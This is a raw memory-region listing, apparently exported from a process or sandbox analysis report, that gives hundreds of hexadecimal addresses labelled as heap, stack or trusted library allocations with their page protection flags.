trusted library allocation
|
page read and write
|
||
20567FA0000
|
trusted library allocation
|
page read and write
|
||
7FF849240000
|
trusted library allocation
|
page execute and read and write
|
||
BDD000
|
heap
|
page read and write
|
||
20568100000
|
trusted library allocation
|
page read and write
|
||
7FF849190000
|
trusted library allocation
|
page read and write
|
||
1780000
|
trusted library allocation
|
page read and write
|
||
2D63000
|
trusted library allocation
|
page read and write
|
||
2D68000
|
trusted library allocation
|
page read and write
|
||
88A000
|
heap
|
page read and write
|
||
20690245000
|
trusted library allocation
|
page read and write
|
||
2600000
|
trusted library section
|
page read and write
|
||
2A2B70A7000
|
heap
|
page read and write
|
||
2743000
|
trusted library allocation
|
page read and write
|
||
1B7AC000
|
heap
|
page read and write
|
||
1B146EB9000
|
trusted library allocation
|
page read and write
|
||
1BEC3000
|
stack
|
page read and write
|
||
28E5008C000
|
trusted library allocation
|
page read and write
|
||
2056819D000
|
trusted library allocation
|
page read and write
|
||
1B146E63000
|
trusted library allocation
|
page read and write
|
||
7FF8490AC000
|
trusted library allocation
|
page read and write
|
||
1B86E000
|
stack
|
page read and write
|
||
7FF848E23000
|
trusted library allocation
|
page read and write
|
||
206ED64F000
|
heap
|
page read and write
|
||
1AEE0000
|
heap
|
page read and write
|
||
7FF848E1B000
|
trusted library allocation
|
page read and write
|
||
322C000
|
trusted library allocation
|
page read and write
|
||
20555F50000
|
heap
|
page read and write
|
||
C96A4BD000
|
stack
|
page read and write
|
||
10A5000
|
heap
|
page read and write
|
||
7FF849260000
|
trusted library allocation
|
page read and write
|
||
7FF848E13000
|
trusted library allocation
|
page read and write
|
||
16F0000
|
heap
|
page read and write
|
||
86F000
|
heap
|
page read and write
|
||
7FF848EB6000
|
trusted library allocation
|
page read and write
|
||
7FF84902C000
|
trusted library allocation
|
page read and write
|
||
7FF849178000
|
trusted library allocation
|
page read and write
|
||
7FF848DF6000
|
trusted library allocation
|
page read and write
|
||
1C81E000
|
heap
|
page read and write
|
||
9E8F478000
|
stack
|
page read and write
|
||
12438000
|
trusted library allocation
|
page read and write
|
||
2A2B6FD0000
|
heap
|
page read and write
|
||
1C420000
|
heap
|
page read and write
|
||
1B146F38000
|
trusted library allocation
|
page read and write
|
||
1A510000
|
trusted library allocation
|
page read and write
|
||
12CB3000
|
trusted library allocation
|
page read and write
|
||
205681B4000
|
trusted library allocation
|
page read and write
|
||
1B62D000
|
stack
|
page read and write
|
||
7FF848FC7000
|
trusted library allocation
|
page read and write
|
||
B80000
|
heap
|
page read and write
|
||
27B0000
|
heap
|
page execute and read and write
|
||
7FF848F99000
|
trusted library allocation
|
page read and write
|
||
5B0000
|
heap
|
page read and write
|
||
2A2873F000
|
stack
|
page read and write
|
||
7FF849030000
|
trusted library allocation
|
page read and write
|
||
7FF849000000
|
trusted library allocation
|
page execute and read and write
|
||
7FF849140000
|
trusted library allocation
|
page read and write
|
||
28E666F1000
|
heap
|
page read and write
|
||
20690259000
|
trusted library allocation
|
page read and write
|
||
1DB1B182000
|
trusted library allocation
|
page read and write
|
||
1B146EF7000
|
trusted library allocation
|
page read and write
|
||
2A2C9148000
|
trusted library allocation
|
page read and write
|
||
7FF848F10000
|
trusted library allocation
|
page execute and read and write
|
||
7FF848F87000
|
trusted library allocation
|
page read and write
|
||
D6F000
|
stack
|
page read and write
|
||
3149000
|
trusted library allocation
|
page read and write
|
||
B20000
|
trusted library allocation
|
page read and write
|
||
1B72E000
|
stack
|
page read and write
|
||
7FF849050000
|
trusted library allocation
|
page read and write
|
||
C96A53E000
|
stack
|
page read and write
|
||
2A28B3B000
|
stack
|
page read and write
|
||
20680001000
|
trusted library allocation
|
page read and write
|
||
FAA000
|
heap
|
page read and write
|
||
1DB3257D000
|
heap
|
page read and write
|
||
7FF849240000
|
trusted library allocation
|
page read and write
|
||
20690467000
|
trusted library allocation
|
page read and write
|
||
BCB000
|
heap
|
page read and write
|
||
82B000
|
heap
|
page read and write
|
||
2A2C93D5000
|
trusted library allocation
|
page read and write
|
||
C40000
|
heap
|
page execute and read and write
|
||
206904A8000
|
trusted library allocation
|
page read and write
|
||
F9D000
|
heap
|
page read and write
|
||
1B146C23000
|
trusted library allocation
|
page read and write
|
||
2069028E000
|
trusted library allocation
|
page read and write
|
||
7FF848DFD000
|
trusted library allocation
|
page execute and read and write
|
||
7FF848FD8000
|
trusted library allocation
|
page read and write
|
||
7FF849160000
|
trusted library allocation
|
page read and write
|
||
7FF848E14000
|
trusted library allocation
|
page read and write
|
||
7FF848E10000
|
trusted library allocation
|
page read and write
|
||
2A2C923A000
|
trusted library allocation
|
page read and write
|
||
D90000
|
trusted library allocation
|
page read and write
|
||
1B14704F000
|
trusted library allocation
|
page read and write
|
||
2A2C9326000
|
trusted library allocation
|
page read and write
|
||
3238000
|
trusted library allocation
|
page read and write
|
||
2069035E000
|
trusted library allocation
|
page read and write
|
||
B50000
|
heap
|
page read and write
|
||
206813C0000
|
trusted library allocation
|
page read and write
|
||
B8F000
|
stack
|
page read and write
|
||
2A2BA8E1000
|
trusted library allocation
|
page read and write
|
||
10E5000
|
heap
|
page read and write
|
||
7FF848ED0000
|
trusted library allocation
|
page execute and read and write
|
||
206EB293000
|
heap
|
page read and write
|
||
7FF8490E0000
|
trusted library allocation
|
page read and write
|
||
1B714000
|
heap
|
page read and write
|
||
1DB325A3000
|
heap
|
page read and write
|
||
1B146FCC000
|
trusted library allocation
|
page read and write
|
||
C96B28D000
|
stack
|
page read and write
|
||
141A000
|
heap
|
page read and write
|
||
F05000
|
heap
|
page read and write
|
||
7FF848FC9000
|
trusted library allocation
|
page read and write
|
||
7FF849047000
|
trusted library allocation
|
page read and write
|
||
3E5000
|
heap
|
page read and write
|
||
9A8000
|
heap
|
page read and write
|
||
206EB218000
|
heap
|
page read and write
|
||
7FF848E13000
|
trusted library allocation
|
page execute and read and write
|
||
206903F4000
|
trusted library allocation
|
page read and write
|
||
205682E0000
|
trusted library allocation
|
page read and write
|
||
2A2C907E000
|
trusted library allocation
|
page read and write
|
||
1460000
|
heap
|
page read and write
|
||
1BCFE000
|
stack
|
page read and write
|
||
7FF848FA7000
|
trusted library allocation
|
page read and write
|
||
B10000
|
heap
|
page read and write
|
||
3C0000
|
heap
|
page read and write
|
||
14C0000
|
trusted library allocation
|
page read and write
|
||
7FF8491F0000
|
trusted library allocation
|
page read and write
|
||
7FF848EC6000
|
trusted library allocation
|
page read and write
|
||
1C1CF000
|
stack
|
page read and write
|
||
96B000
|
heap
|
page read and write
|
||
285E000
|
trusted library allocation
|
page read and write
|
||
E4F000
|
heap
|
page read and write
|
||
1BE3E000
|
stack
|
page read and write
|
||
206811D8000
|
trusted library allocation
|
page read and write
|
||
7FF848E23000
|
trusted library allocation
|
page read and write
|
||
2B6E000
|
stack
|
page read and write
|
||
205680E1000
|
trusted library allocation
|
page read and write
|
||
20568185000
|
trusted library allocation
|
page read and write
|
||
1B136AD0000
|
trusted library allocation
|
page read and write
|
||
2A2B72B0000
|
trusted library allocation
|
page read and write
|
||
1C399000
|
stack
|
page read and write
|
||
2A2C93FE000
|
trusted library allocation
|
page read and write
|
||
7FF848E2B000
|
trusted library allocation
|
page read and write
|
||
2A2B6FF0000
|
heap
|
page read and write
|
||
8AF000
|
heap
|
page read and write
|
||
12A8D000
|
trusted library allocation
|
page read and write
|
||
1B146E9C000
|
trusted library allocation
|
page read and write
|
||
20568377000
|
trusted library allocation
|
page read and write
|
||
7FF84920A000
|
trusted library allocation
|
page read and write
|
||
7FF849220000
|
trusted library allocation
|
page read and write
|
||
7FF849100000
|
trusted library allocation
|
page read and write
|
||
7FF848E6C000
|
trusted library allocation
|
page execute and read and write
|
||
7FF848DFB000
|
trusted library allocation
|
page read and write
|
||
7FF848E1B000
|
trusted library allocation
|
page execute and read and write
|
||
20568317000
|
trusted library allocation
|
page read and write
|
||
7FF848DF3000
|
trusted library allocation
|
page read and write
|
||
973000
|
heap
|
page read and write
|
||
7FF848FA0000
|
trusted library allocation
|
page read and write
|
||
7FF848E08000
|
trusted library allocation
|
page read and write
|
||
2EB0000
|
heap
|
page execute and read and write
|
||
2A2B70E4000
|
heap
|
page read and write
|
||
7FF8490F1000
|
trusted library allocation
|
page read and write
|
||
20568268000
|
trusted library allocation
|
page read and write
|
||
1C24E000
|
stack
|
page read and write
|
||
7FF848FAE000
|
trusted library allocation
|
page read and write
|
||
205680FD000
|
trusted library allocation
|
page read and write
|
||
1C41E000
|
stack
|
page read and write
|
||
710000
|
trusted library allocation
|
page read and write
|
||
206EB1E0000
|
heap
|
page read and write
|
||
20568103000
|
trusted library allocation
|
page read and write
|
||
7FF849000000
|
trusted library allocation
|
page read and write
|
||
C53577E000
|
stack
|
page read and write
|
||
7FF848EE6000
|
trusted library allocation
|
page execute and read and write
|
||
FEE6B36000
|
stack
|
page read and write
|
||
124F1000
|
trusted library allocation
|
page read and write
|
||
2056830D000
|
trusted library allocation
|
page read and write
|
||
88C000
|
heap
|
page read and write
|
||
206903CF000
|
trusted library allocation
|
page read and write
|
||
B10000
|
trusted library section
|
page read and write
|
||
1BC7E000
|
stack
|
page read and write
|
||
7FF848E20000
|
trusted library allocation
|
page read and write
|
||
1DB1AD80000
|
trusted library allocation
|
page read and write
|
||
1555000
|
heap
|
page read and write
|
||
205683DB000
|
trusted library allocation
|
page read and write
|
||
7FF849080000
|
trusted library allocation
|
page read and write
|
||
7FF848E30000
|
trusted library allocation
|
page read and write
|
||
1CC19000
|
heap
|
page read and write
|
||
825000
|
heap
|
page read and write
|
||
206ECC40000
|
heap
|
page readonly
|
||
2A2C924F000
|
trusted library allocation
|
page read and write
|
||
31E0000
|
heap
|
page execute and read and write
|
||
28E663EA000
|
heap
|
page read and write
|
||
7FF848F35000
|
trusted library allocation
|
page execute and read and write
|
||
205681D9000
|
trusted library allocation
|
page read and write
|
||
206901DE000
|
trusted library allocation
|
page read and write
|
||
1B73C000
|
heap
|
page read and write
|
||
780000
|
heap
|
page read and write
|
||
20570430000
|
heap
|
page read and write
|
||
D70000
|
heap
|
page read and write
|
||
2550000
|
heap
|
page read and write
|
||
7FF848F20000
|
trusted library allocation
|
page execute and read and write
|
||
313F000
|
stack
|
page read and write
|
||
7FF848E96000
|
trusted library allocation
|
page read and write
|
||
7FF848F20000
|
trusted library allocation
|
page execute and read and write
|
||
2A2C92C9000
|
trusted library allocation
|
page read and write
|
||
1482000
|
heap
|
page read and write
|
||
7FF848E0B000
|
trusted library allocation
|
page read and write
|
||
3146000
|
trusted library allocation
|
page read and write
|
||
1B746000
|
heap
|
page read and write
|
||
7FF848E1D000
|
trusted library allocation
|
page execute and read and write
|
||
2069034F000
|
trusted library allocation
|
page read and write
|
||
969000
|
heap
|
page read and write
|
||
1B146FA5000
|
trusted library allocation
|
page read and write
|
||
2A2C913A000
|
trusted library allocation
|
page read and write
|
||
7FF849100000
|
trusted library allocation
|
page read and write
|
||
20556030000
|
heap
|
page read and write
|
||
1DB32328000
|
heap
|
page read and write
|
||
C5357F9000
|
stack
|
page read and write
|
||
1B6EF000
|
stack
|
page read and write
|
||
C969D7F000
|
unkown
|
page read and write
|
||
7FF848F25000
|
trusted library allocation
|
page execute and read and write
|
||
2A2C9253000
|
trusted library allocation
|
page read and write
|
||
1B14F121000
|
heap
|
page read and write
|
||
2A2C8FC3000
|
trusted library allocation
|
page read and write
|
||
7FF849060000
|
trusted library allocation
|
page read and write
|
||
2A2C9244000
|
trusted library allocation
|
page read and write
|
||
7FF848FA7000
|
trusted library allocation
|
page read and write
|
||
1B146F80000
|
trusted library allocation
|
page read and write
|
||
1DB1B902000
|
trusted library allocation
|
page read and write
|
||
2A2C93BF000
|
trusted library allocation
|
page read and write
|
||
28E500D1000
|
trusted library allocation
|
page read and write
|
||
2900000
|
heap
|
page read and write
|
||
205680C0000
|
trusted library allocation
|
page read and write
|
||
7FF848E16000
|
trusted library allocation
|
page read and write
|
||
2890000
|
trusted library allocation
|
page read and write
|
||
C535BFE000
|
stack
|
page read and write
|
||
20559234000
|
trusted library allocation
|
page read and write
|
||
106F000
|
stack
|
page read and write
|
||
1AFFF000
|
stack
|
page read and write
|
||
1940000
|
heap
|
page read and write
|
||
28E4C508000
|
heap
|
page read and write
|
||
7FF848F8E000
|
trusted library allocation
|
page read and write
|
||
206ED300000
|
heap
|
page read and write
|
||
20559798000
|
trusted library allocation
|
page read and write
|
||
1B23E000
|
stack
|
page read and write
|
||
1B380000
|
heap
|
page execute and read and write
|
||
1B726000
|
heap
|
page read and write
|
||
7FF848E2D000
|
trusted library allocation
|
page execute and read and write
|
||
17F0000
|
heap
|
page read and write
|
||
7E0000
|
heap
|
page read and write
|
||
206EB24C000
|
heap
|
page read and write
|
||
B20000
|
trusted library allocation
|
page read and write
|
||
1DB32187000
|
heap
|
page read and write
|
||
2A2C9055000
|
trusted library allocation
|
page read and write
|
||
2F90000
|
heap
|
page read and write
|
||
7FF8490C0000
|
trusted library allocation
|
page read and write
|
||
1B0BE000
|
stack
|
page read and write
|
||
635000
|
heap
|
page read and write
|
||
1B146E7F000
|
trusted library allocation
|
page read and write
|
||
7FF848EA0000
|
trusted library allocation
|
page execute and read and write
|
||
7FF849170000
|
trusted library allocation
|
page read and write
|
||
20556090000
|
heap
|
page read and write
|
||
124FD000
|
trusted library allocation
|
page read and write
|
||
124D8000
|
trusted library allocation
|
page read and write
|
||
206ECD70000
|
trusted library allocation
|
page read and write
|
||
7FF849260000
|
trusted library allocation
|
page read and write
|
||
7FF84925B000
|
trusted library allocation
|
page read and write
|
||
7FF848E0D000
|
trusted library allocation
|
page execute and read and write
|
||
1AC50000
|
trusted library allocation
|
page read and write
|
||
205704F7000
|
heap
|
page read and write
|
||
7FF848E10000
|
trusted library allocation
|
page read and write
|
||
D40000
|
heap
|
page read and write
|
||
CC4CD8E000
|
stack
|
page read and write
|
||
1B14F187000
|
heap
|
page read and write
|
||
20568107000
|
trusted library allocation
|
page read and write
|
||
7FF848F30000
|
trusted library allocation
|
page execute and read and write
|
||
1B8DB000
|
heap
|
page read and write
|
||
7FF848DE2000
|
trusted library allocation
|
page read and write
|
||
20570568000
|
heap
|
page read and write
|
||
14A1000
|
heap
|
page read and write
|
||
1B5F3000
|
stack
|
page read and write
|
||
2A2C9346000
|
trusted library allocation
|
page read and write
|
||
1B8E6000
|
heap
|
page read and write
|
||
1DB183F0000
|
trusted library allocation
|
page read and write
|
||
2A2C930E000
|
trusted library allocation
|
page read and write
|
||
206904B2000
|
trusted library allocation
|
page read and write
|
||
7FF848E20000
|
trusted library allocation
|
page read and write
|
||
7FF8490B0000
|
trusted library allocation
|
page read and write
|
||
1DB32614000
|
heap
|
page read and write
|
||
2A2B709D000
|
heap
|
page read and write
|
||
7FF848E12000
|
trusted library allocation
|
page read and write
|
||
14A4000
|
heap
|
page read and write
|
||
1B137C81000
|
trusted library allocation
|
page read and write
|
||
20690282000
|
trusted library allocation
|
page read and write
|
||
7FF848F92000
|
trusted library allocation
|
page read and write
|
||
2A2C924D000
|
trusted library allocation
|
page read and write
|
||
7FF848E0D000
|
trusted library allocation
|
page execute and read and write
|
||
7FF8490F8000
|
trusted library allocation
|
page read and write
|
||
2A2C9126000
|
trusted library allocation
|
page read and write
|
||
2A2950E000
|
stack
|
page read and write
|
||
BF1000
|
heap
|
page read and write
|
||
1281D000
|
trusted library allocation
|
page read and write
|
||
2A2C9324000
|
trusted library allocation
|
page read and write
|
||
1B4BC000
|
stack
|
page read and write
|
||
DB0000
|
trusted library allocation
|
page read and write
|
||
2056801F000
|
trusted library allocation
|
page read and write
|
||
28BA000
|
trusted library allocation
|
page read and write
|
||
7FF849020000
|
trusted library allocation
|
page execute and read and write
|
||
1B146E82000
|
trusted library allocation
|
page read and write
|
||
5FB000
|
heap
|
page read and write
|
||
A70000
|
heap
|
page read and write
|
||
1330000
|
heap
|
page read and write
|
||
7FF848E0D000
|
trusted library allocation
|
page execute and read and write
|
||
2A2D1178000
|
heap
|
page read and write
|
||
1430000
|
heap
|
page read and write
|
||
205583FD000
|
trusted library allocation
|
page read and write
|
||
1DB2A487000
|
trusted library allocation
|
page read and write
|
||
1B146FF0000
|
trusted library allocation
|
page read and write
|
||
ACF000
|
heap
|
page read and write
|
||
7FF848DF6000
|
trusted library allocation
|
page read and write
|
||
EB0000
|
heap
|
page read and write
|
||
A3E000
|
stack
|
page read and write
|
||
940000
|
heap
|
page read and write
|
||
1DB1B38F000
|
trusted library allocation
|
page read and write
|
||
7FF848DF3000
|
trusted library allocation
|
page execute and read and write
|
||
28E4E100000
|
trusted library allocation
|
page read and write
|
||
1DB322C5000
|
heap
|
page read and write
|
||
E00000
|
trusted library allocation
|
page read and write
|
||
2A2D14D3000
|
heap
|
page read and write
|
||
20570444000
|
heap
|
page read and write
|
||
1B680000
|
heap
|
page read and write
|
||
7FF849178000
|
trusted library allocation
|
page read and write
|
||
18FE000
|
stack
|
page read and write
|
||
1AE9E000
|
stack
|
page read and write
|
||
7FF848EC0000
|
trusted library allocation
|
page execute and read and write
|
||
2069043D000
|
trusted library allocation
|
page read and write
|
||
7FF848DE6000
|
trusted library allocation
|
page read and write
|
||
7FF848FA2000
|
trusted library allocation
|
page read and write
|
||
7FF848FF4000
|
trusted library allocation
|
page read and write
|
||
20559D51000
|
trusted library allocation
|
page read and write
|
||
206ED508000
|
heap
|
page read and write
|
||
34FE000
|
trusted library allocation
|
page read and write
|
||
7FF848E24000
|
trusted library allocation
|
page read and write
|
||
1B693000
|
stack
|
page read and write
|
||
1B8A7000
|
heap
|
page read and write
|
||
20568365000
|
trusted library allocation
|
page read and write
|
||
2055913F000
|
trusted library allocation
|
page read and write
|
||
7FF848FB2000
|
trusted library allocation
|
page read and write
|
||
2A2C9222000
|
trusted library allocation
|
page read and write
|
||
B15000
|
heap
|
page read and write
|
||
206ED2F0000
|
heap
|
page execute and read and write
|
||
8F8000
|
heap
|
page read and write
|
||
2069038C000
|
trusted library allocation
|
page read and write
|
||
2A2C93A6000
|
trusted library allocation
|
page read and write
|
||
7FF848ECC000
|
trusted library allocation
|
page execute and read and write
|
||
7FF849250000
|
trusted library allocation
|
page read and write
|
||
2A2C9213000
|
trusted library allocation
|
page read and write
|
||
1DB1BA0E000
|
trusted library allocation
|
page read and write
|
||
7FF848FB7000
|
trusted library allocation
|
page read and write
|
||
7FF848FAE000
|
trusted library allocation
|
page read and write
|
||
7FF848E30000
|
trusted library allocation
|
page read and write
|
||
2AE3000
|
trusted library allocation
|
page read and write
|
||
2A2C9285000
|
trusted library allocation
|
page read and write
|
||
1B684000
|
stack
|
page read and write
|
||
B40000
|
trusted library allocation
|
page read and write
|
||
E20000
|
heap
|
page read and write
|
||
1B70D000
|
stack
|
page read and write
|
||
CE0000
|
heap
|
page read and write
|
||
1B480000
|
heap
|
page execute and read and write
|
||
20690422000
|
trusted library allocation
|
page read and write
|
||
17F0000
|
heap
|
page read and write
|
||
BB0000
|
trusted library allocation
|
page read and write
|
||
B33000
|
trusted library allocation
|
page read and write
|
||
2069046E000
|
trusted library allocation
|
page read and write
|
||
2056818B000
|
trusted library allocation
|
page read and write
|
||
2A2C91EC000
|
trusted library allocation
|
page read and write
|
||
7FF848FE2000
|
trusted library allocation
|
page read and write
|
||
1243D000
|
trusted library allocation
|
page read and write
|
||
7FF848DE4000
|
trusted library allocation
|
page read and write
|
||
20568025000
|
trusted library allocation
|
page read and write
|
||
1515000
|
heap
|
page read and write
|
||
7DF4447E0000
|
trusted library allocation
|
page execute and read and write
|
||
1B25E000
|
stack
|
page read and write
|
||
2748000
|
trusted library allocation
|
page read and write
|
||
1DB18410000
|
trusted library allocation
|
page read and write
|
||
1DB18500000
|
heap
|
page read and write
|
||
81D000
|
heap
|
page read and write
|
||
128C1000
|
trusted library allocation
|
page read and write
|
||
1B736000
|
heap
|
page read and write
|
||
1B146FF5000
|
trusted library allocation
|
page read and write
|
||
7FF848ECC000
|
trusted library allocation
|
page execute and read and write
|
||
2A2C93D9000
|
trusted library allocation
|
page read and write
|
||
2069038F000
|
trusted library allocation
|
page read and write
|
||
7FF849250000
|
trusted library allocation
|
page read and write
|
||
1B82F000
|
stack
|
page read and write
|
||
DF0000
|
heap
|
page read and write
|
||
2A2C91F9000
|
trusted library allocation
|
page read and write
|
||
2476000
|
trusted library allocation
|
page read and write
|
||
7FF848E6C000
|
trusted library allocation
|
page execute and read and write
|
||
2A2B945D000
|
trusted library allocation
|
page read and write
|
||
2A2C90E5000
|
trusted library allocation
|
page read and write
|
||
7FF849120000
|
trusted library allocation
|
page read and write
|
||
206903C3000
|
trusted library allocation
|
page read and write
|
||
1B2AE000
|
stack
|
page read and write
|
||
2056813F000
|
trusted library allocation
|
page read and write
|
||
7FF848F97000
|
trusted library allocation
|
page read and write
|
||
1DB2A1B1000
|
trusted library allocation
|
page read and write
|
||
7FF848E5C000
|
trusted library allocation
|
page execute and read and write
|
||
7FF849040000
|
trusted library allocation
|
page read and write
|
||
1AAED000
|
stack
|
page read and write
|
||
7FF848FF2000
|
trusted library allocation
|
page read and write
|
||
2C1F000
|
trusted library allocation
|
page read and write
|
||
205682B6000
|
trusted library allocation
|
page read and write
|
||
7FF848EC6000
|
trusted library allocation
|
page read and write
|
||
205682CA000
|
trusted library allocation
|
page read and write
|
||
1B14F01C000
|
heap
|
page read and write
|
||
7FF848F15000
|
trusted library allocation
|
page execute and read and write
|
||
C96A07F000
|
stack
|
page read and write
|
||
7FF848E10000
|
trusted library allocation
|
page read and write
|
||
20568174000
|
trusted library allocation
|
page read and write
|
||
7FF848E1D000
|
trusted library allocation
|
page execute and read and write
|
||
AB0000
|
trusted library allocation
|
page read and write
|
||
222E000
|
stack
|
page read and write
|
||
20568073000
|
trusted library allocation
|
page read and write
|
||
151D000
|
heap
|
page read and write
|
||
7FF848F92000
|
trusted library allocation
|
page read and write
|
||
2800000
|
heap
|
page execute and read and write
|
||
1B7A5000
|
heap
|
page read and write
|
||
A20000
|
heap
|
page read and write
|
||
1B3FF000
|
stack
|
page read and write
|
||
28E667A0000
|
heap
|
page read and write
|
||
20690469000
|
trusted library allocation
|
page read and write
|
||
BE1000
|
heap
|
page read and write
|
||
1B14F00C000
|
heap
|
page read and write
|
||
1280000
|
heap
|
page execute and read and write
|
||
2A2C9332000
|
trusted library allocation
|
page read and write
|
||
1B14F049000
|
heap
|
page read and write
|
||
7FF849240000
|
trusted library allocation
|
page read and write
|
||
CC4BDFD000
|
stack
|
page read and write
|
||
F8D000
|
heap
|
page read and write
|
||
7FF848FD5000
|
trusted library allocation
|
page read and write
|
||
90C000
|
heap
|
page read and write
|
||
1B146F3E000
|
trusted library allocation
|
page read and write
|
||
7FF849112000
|
trusted library allocation
|
page read and write
|
||
2745000
|
trusted library allocation
|
page read and write
|
||
7FF848E2B000
|
trusted library allocation
|
page execute and read and write
|
||
7FF848DF4000
|
trusted library allocation
|
page read and write
|
||
28E6675E000
|
heap
|
page read and write
|
||
7FF848FA9000
|
trusted library allocation
|
page read and write
|
||
2A2C933C000
|
trusted library allocation
|
page read and write
|
||
7FF848DFD000
|
trusted library allocation
|
page execute and read and write
|
||
1630000
|
trusted library allocation
|
page read and write
|
||
A8F000
|
stack
|
page read and write
|
||
1B678000
|
heap
|
page read and write
|
||
1090000
|
heap
|
page read and write
|
||
1DB322C3000
|
heap
|
page read and write
|
||
28E4FBA1000
|
trusted library allocation
|
page read and write
|
||
630000
|
heap
|
page read and write
|
||
206EB5B0000
|
heap
|
page read and write
|
||
CC4BF37000
|
stack
|
page read and write
|
||
13448000
|
trusted library allocation
|
page read and write
|
||
1B147058000
|
trusted library allocation
|
page read and write
|
||
C05000
|
heap
|
page read and write
|
||
2610000
|
heap
|
page read and write
|
||
7FF848FB2000
|
trusted library allocation
|
page read and write
|
||
20568001000
|
trusted library allocation
|
page read and write
|
||
7FF849090000
|
trusted library allocation
|
page read and write
|
||
12CB8000
|
trusted library allocation
|
page read and write
|
||
B90000
|
heap
|
page read and write
|
||
7FF848E3B000
|
trusted library allocation
|
page read and write
|
||
7FF848FAE000
|
trusted library allocation
|
page read and write
|
||
13183000
|
trusted library allocation
|
page read and write
|
||
131F1000
|
trusted library allocation
|
page read and write
|
||
7FF84917C000
|
trusted library allocation
|
page read and write
|
||
20681093000
|
trusted library allocation
|
page read and write
|
||
EC0000
|
trusted library allocation
|
page read and write
|
||
7FF849070000
|
trusted library allocation
|
page read and write
|
||
F0D000
|
heap
|
page read and write
|
||
1B14F042000
|
heap
|
page read and write
|
||
106F000
|
stack
|
page read and write
|
||
940000
|
heap
|
page read and write
|
||
7FF848FAA000
|
trusted library allocation
|
page read and write
|
||
2A2C9194000
|
trusted library allocation
|
page read and write
|
||
1B1BE000
|
stack
|
page read and write
|
||
1B14ED95000
|
heap
|
page read and write
|
||
C535DFB000
|
stack
|
page read and write
|
||
2A2BAD84000
|
trusted library allocation
|
page read and write
|
||
206902C1000
|
trusted library allocation
|
page read and write
|
||
7FF848E2B000
|
trusted library allocation
|
page execute and read and write
|
||
12524000
|
trusted library allocation
|
page read and write
|
||
C53694D000
|
stack
|
page read and write
|
||
1AF8C000
|
stack
|
page read and write
|
||
25D0000
|
trusted library allocation
|
page read and write
|
||
205681CE000
|
trusted library allocation
|
page read and write
|
||
206903D5000
|
trusted library allocation
|
page read and write
|
||
205681C5000
|
trusted library allocation
|
page read and write
|
||
7FF848E00000
|
trusted library allocation
|
page read and write
|
||
7FF849159000
|
trusted library allocation
|
page read and write
|
||
1B136AA0000
|
trusted library allocation
|
page read and write
|
||
2A2C9145000
|
trusted library allocation
|
page read and write
|
||
1BC2E000
|
stack
|
page read and write
|
||
28B0000
|
trusted library allocation
|
page read and write
|
||
31EF000
|
stack
|
page read and write
|
||
1410000
|
heap
|
page read and write
|
||
1B10F000
|
stack
|
page read and write
|
||
7FF849260000
|
trusted library allocation
|
page read and write
|
||
205683E5000
|
trusted library allocation
|
page read and write
|
||
2056814E000
|
trusted library allocation
|
page read and write
|
||
E20000
|
heap
|
page execute and read and write
|
||
28E4EEE2000
|
trusted library allocation
|
page read and write
|
||
1B2DE000
|
stack
|
page read and write
|
||
1B14EE80000
|
trusted library allocation
|
page read and write
|
||
2069047E000
|
trusted library allocation
|
page read and write
|
||
CC4CC8E000
|
stack
|
page read and write
|
||
2A2867D000
|
stack
|
page read and write
|
||
28E6672B000
|
heap
|
page read and write
|
||
20680229000
|
trusted library allocation
|
page read and write
|
||
1AD9D000
|
stack
|
page read and write
|
||
15AF000
|
stack
|
page read and write
|
||
C55000
|
heap
|
page read and write
|
||
7FF848DFD000
|
trusted library allocation
|
page execute and read and write
|
||
1B136C76000
|
trusted library allocation
|
page read and write
|
||
7FF848E1D000
|
trusted library allocation
|
page execute and read and write
|
||
B60000
|
trusted library allocation
|
page read and write
|
||
B20000
|
trusted library section
|
page read and write
|
||
7FF8491A0000
|
trusted library allocation
|
page read and write
|
||
C96A438000
|
stack
|
page read and write
|
||
1B66E000
|
stack
|
page read and write
|
||
1C830000
|
heap
|
page read and write
|
||
7FF848FB2000
|
trusted library allocation
|
page read and write
|
||
1A8AD000
|
stack
|
page read and write
|
||
2A2D1217000
|
heap
|
page execute and read and write
|
||
7FF848E2B000
|
trusted library allocation
|
page read and write
|
||
7FF8491E0000
|
trusted library allocation
|
page read and write
|
||
1B1470A1000
|
trusted library allocation
|
page read and write
|
||
87F000
|
heap
|
page read and write
|
||
1A660000
|
trusted library allocation
|
page read and write
|
||
1B864000
|
heap
|
page read and write
|
||
78C000
|
heap
|
page read and write
|
||
2520000
|
heap
|
page execute and read and write
|
||
B1F000
|
stack
|
page read and write
|
||
261F000
|
stack
|
page read and write
|
||
1B72E000
|
heap
|
page read and write
|
||
20568263000
|
trusted library allocation
|
page read and write
|
||
7FF84917C000
|
trusted library allocation
|
page read and write
|
||
2056819A000
|
trusted library allocation
|
page read and write
|
||
2A2D1120000
|
heap
|
page read and write
|
||
7FF848FF8000
|
trusted library allocation
|
page read and write
|
||
7FF849280000
|
trusted library allocation
|
page read and write
|
||
205682DD000
|
trusted library allocation
|
page read and write
|
||
7FF848FCA000
|
trusted library allocation
|
page read and write
|
||
7FF849160000
|
trusted library allocation
|
page read and write
|
||
205560D0000
|
trusted library allocation
|
page read and write
|
||
2A2B8F91000
|
trusted library allocation
|
page read and write
|
||
20567FF6000
|
trusted library allocation
|
page read and write
|
||
7FF848E18000
|
trusted library allocation
|
page read and write
|
||
CC4C23E000
|
stack
|
page read and write
|
||
205683CD000
|
trusted library allocation
|
page read and write
|
||
DDA000
|
heap
|
page read and write
|
||
7FF8490CF000
|
trusted library allocation
|
page read and write
|
||
A90000
|
trusted library allocation
|
page read and write
|
||
7FF848E03000
|
trusted library allocation
|
page read and write
|
||
1B05E000
|
stack
|
page read and write
|
||
2056808E000
|
trusted library allocation
|
page read and write
|
||
EB0000
|
heap
|
page read and write
|
||
AC5000
|
heap
|
page read and write
|
||
EE8000
|
heap
|
page read and write
|
||
C5369CE000
|
stack
|
page read and write
|
||
28E4F3D0000
|
trusted library allocation
|
page read and write
|
||
205680C2000
|
trusted library allocation
|
page read and write
|
||
370000
|
heap
|
page read and write
|
||
7FF848E1B000
|
trusted library allocation
|
page read and write
|
||
7FF848E28000
|
trusted library allocation
|
page read and write
|
||
3E0000
|
heap
|
page read and write
|
||
20690404000
|
trusted library allocation
|
page read and write
|
||
B55000
|
heap
|
page read and write
|
||
230F000
|
stack
|
page read and write
|
||
14CB000
|
heap
|
page read and write
|
||
2A2BA294000
|
trusted library allocation
|
page read and write
|
||
206ED68A000
|
heap
|
page read and write
|
||
1B533000
|
stack
|
page read and write
|
||
2C5E000
|
trusted library allocation
|
page read and write
|
||
7FF8490A0000
|
trusted library allocation
|
page read and write
|
||
2056818E000
|
trusted library allocation
|
